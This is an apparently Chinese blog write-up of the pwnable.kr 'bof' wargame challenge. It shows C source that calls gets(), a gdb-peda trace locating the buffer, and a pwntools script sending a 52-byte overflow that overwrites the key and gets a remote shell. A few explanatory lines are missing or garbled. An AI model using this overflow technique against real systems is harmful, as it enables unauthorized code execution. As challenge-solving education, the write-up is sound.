• pwnable.kr bof之write up


    这一题与前两题不同,用到了静态调试工具ida

    首先题中给出了源码:

     1 #include <stdio.h>
     2 #include <string.h>
     3 #include <stdlib.h>
     4 void func(int key){
     5     char overflowme[32];
     6     printf("overflow me : ");
     7     gets(overflowme);    // smash me!
     8     if(key == 0xcafebabe){
     9         system("/bin/sh");
    10     }
    11     else{
    12         printf("Nah..
    ");
    13     }
    14 }
    15 int main(int argc, char* argv[]){
    16     func(0xdeadbeef);
    17     return 0;
    18 }

    分析源代码:思路是缓冲区溢出

    我们gdb走到func函数内部分析:

    gdb-peda$ n
    
    [----------------------------------registers-----------------------------------]
    EAX: 0xffffd08c (":WUV364oUV260VUV01")
    EBX: 0xf7fbd000 --> 0x1a9da8 
    ECX: 0xf7fd6000 ("overflow me : 
    ")
    EDX: 0xf7fbe898 --> 0x0 
    ESI: 0x0 
    EDI: 0x0 
    EBP: 0xffffd0b8 --> 0xffffd0d8 --> 0x0 
    ESP: 0xffffd070 --> 0xffffd08c (":WUV364oUV260VUV01")
    EIP: 0x5655564f (<func+35>:	call   0xf7e77440 <gets>)
    EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
    [-------------------------------------code-------------------------------------]
       0x56555644 <func+24>:	call   0xf7e77da0 <puts>
       0x56555649 <func+29>:	lea    eax,[ebp-0x2c]
       0x5655564c <func+32>:	mov    DWORD PTR [esp],eax
    => 0x5655564f <func+35>:	call   0xf7e77440 <gets>
       0x56555654 <func+40>:	cmp    DWORD PTR [ebp+0x8],0xcafebabe
       0x5655565b <func+47>:	jne    0x5655566b <func+63>
       0x5655565d <func+49>:	mov    DWORD PTR [esp],0x5655579b
       0x56555664 <func+56>:	call   0xf7e52e70 <system>
    Guessed arguments:
    arg[0]: 0xffffd08c (":WUV364oUV260VUV01")
    [------------------------------------stack-------------------------------------]
    0000| 0xffffd070 --> 0xffffd08c (":WUV364oUV260VUV01")
    0004| 0xffffd074 --> 0x0 
    0008| 0xffffd078 --> 0xbf 
    0012| 0xffffd07c --> 0xf7ea90e6 (test   eax,eax)
    0016| 0xffffd080 --> 0xffffffff 
    0020| 0xffffd084 --> 0xffffd0ae --> 0x56b06aa6 
    0024| 0xffffd088 --> 0xf7e1fc34 --> 0x2aad 
    0028| 0xffffd08c (":WUV364oUV260VUV01")
    [------------------------------------------------------------------------------]
    Legend: code, data, rodata, value
    0x5655564f in func ()

    看这一点:

    也就是说0xffffd08c就是overflowme数组开始的位置

    而由

    得key 的地址0xffffd0c0

    所以只要输入52便可成功覆盖,便可跳转执行system("insh")

    于是写exp:

    1 #!/usr/bin/python
    2 from pwn import *
    3 io = remote("pwnable.kr","9000")
    4 
    5 key = 0xcafebabe
    6 payload = "A" * 52 + p32(key)
    7 
    8 io.send(payload)
    9 io.interactive()

    运行得到

  • 相关阅读:
    如何 Scale Up/Down Deployment?- 每天5分钟玩转 Docker 容器技术(126)
    读懂 Deployment YAML
    k8s 创建资源的两种方式
    在qemu模拟的aarch32上使用kgtp
    交叉编译gdb和gdbserver
    基于设备树的controller学习(2)
    基于设备树的controller学习(1)
    基于设备树的TQ2440 DMA学习(4)—— client驱动
    基于设备树的TQ2440 DMA学习(3)—— DMA控制器驱动
    基于设备树的TQ2440 DMA学习(2)—— 简单的DMA传输
  • 原文地址:https://www.cnblogs.com/liuyimin/p/7269605.html
Copyright © 2020-2023  润新知